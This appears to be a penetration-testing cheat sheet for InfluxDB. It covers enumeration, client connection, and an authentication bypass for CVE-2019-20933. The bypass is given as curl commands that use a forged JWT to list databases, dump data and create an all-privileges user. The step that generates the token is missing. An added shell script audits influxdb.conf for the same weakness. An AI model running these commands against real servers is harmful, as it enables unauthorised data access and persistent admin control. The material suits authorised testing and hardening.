InfluxDB is a time series database written in Go. Its default port is 8086.
Enumeration
    # User enumeration
    curl http://<target-ip>:8086/debug/requests
Connect
    influx -host 10.0.0.1 -port 8086
    influx -host 10.0.0.1 -port 8086 -database <database>
    influx -host 10.0.0.1 -port 8086 -username <username> -password <password>

    # Import db file (-path is only read together with -import)
    influx -import -path example.db
Authentication Bypass (CVE-2019-20933) version ≤ 1.7.6
Copy the generated JWT.
Now we can query the InfluxDB API.
    INFLUXDB_JWT="<JWT>"

    # List databases
    curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'q=SHOW DATABASES' | jq

    # List series in the database
    curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SHOW SERIES' | jq

    # Get values in the series
    curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SELECT * FROM <series>' | jq

    # Create a privileged account
    curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode "q=CREATE USER tester with PASSWORD 'password' with ALL PRIVILEGES"
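To check whether a server you operate is exposed to the bypass above, the following added example (not part of the original page or of InfluxDB itself) audits the `[http]` section of an `influxdb.conf`. The function names and the sample config are constructed for illustration; `auth-enabled` and `shared-secret` are InfluxDB 1.x settings, and the version cutoff is the one given in the heading above.

```shell
# Added example, not from the original page; function names are illustrative.
# CVE-2019-20933: JWT bearer tokens are accepted while the shared secret is empty.

# http_setting FILE KEY: print KEY's value from the [http] section, unquoted.
http_setting() {
  awk -v key="$2" '
    /^[ \t]*#/  { next }                                      # comment line
    /^[ \t]*\[/ { in_http = ($0 ~ /^[ \t]*\[http\]/); next }  # section header
    in_http && $0 ~ ("^[ \t]*" key "[ \t]*=") {
      v = $0; sub(/^[^=]*=[ \t]*/, "", v)
      if (v ~ /^"/) { v = substr(v, 2); sub(/".*$/, "", v) }  # quoted string
      else sub(/[ \t]*(#.*)?$/, "", v)                        # bare value
      print v; exit
    }' "$1"
}

# version_le A B: succeed when dotted version A is less than or equal to B.
version_le() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    n = split(a, x, "."); m = split(b, y, ".")
    for (i = 1; i <= (n > m ? n : m); i++) {
      if (x[i] + 0 < y[i] + 0) exit 0
      if (x[i] + 0 > y[i] + 0) exit 1
    }
    exit 0
  }'
}

# audit_influx CONF VERSION: print one verdict line (VERSION e.g. from `influxd version`).
audit_influx() {
  auth=$(http_setting "$1" auth-enabled)
  secret=$(http_setting "$1" shared-secret)
  if [ "$auth" != "true" ]; then
    echo "FAIL no-auth: auth-enabled is not true, queries need no credentials"
  elif [ -z "$secret" ] && version_le "$2" "1.7.6"; then  # cutoff from the heading
    echo "FAIL CVE-2019-20933: auth on, shared-secret empty, version $2"
  elif [ -z "$secret" ]; then
    echo "OK password-only: auth on, shared-secret empty, version $2"
  else
    echo "OK jwt: auth on, shared-secret set"
  fi
}

# Constructed sample config, not taken from a real host.
sample=$(mktemp)
printf '[http]\n  bind-address = ":8086"\n  auth-enabled = true\n  shared-secret = ""\n' > "$sample"
audit_influx "$sample" "1.7.5"
rm -f "$sample"
```

The check reads the file only; the same settings can also be supplied through environment variables such as `INFLUXDB_HTTP_AUTH_ENABLED` and `INFLUXDB_HTTP_SHARED_SECRET`, which override it.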
Commands
    # Show command history
    > history

    # Show settings
    > settings

    # List databases
    > show databases

    # Show series information
    > show series

    # Show measurement information
    > show measurements

    # Show tag key information
    > show tag keys

    # Show field key information
    > show field keys

    # Switch to the database
    > use <database>

    # Query in the database
    > select * from <series>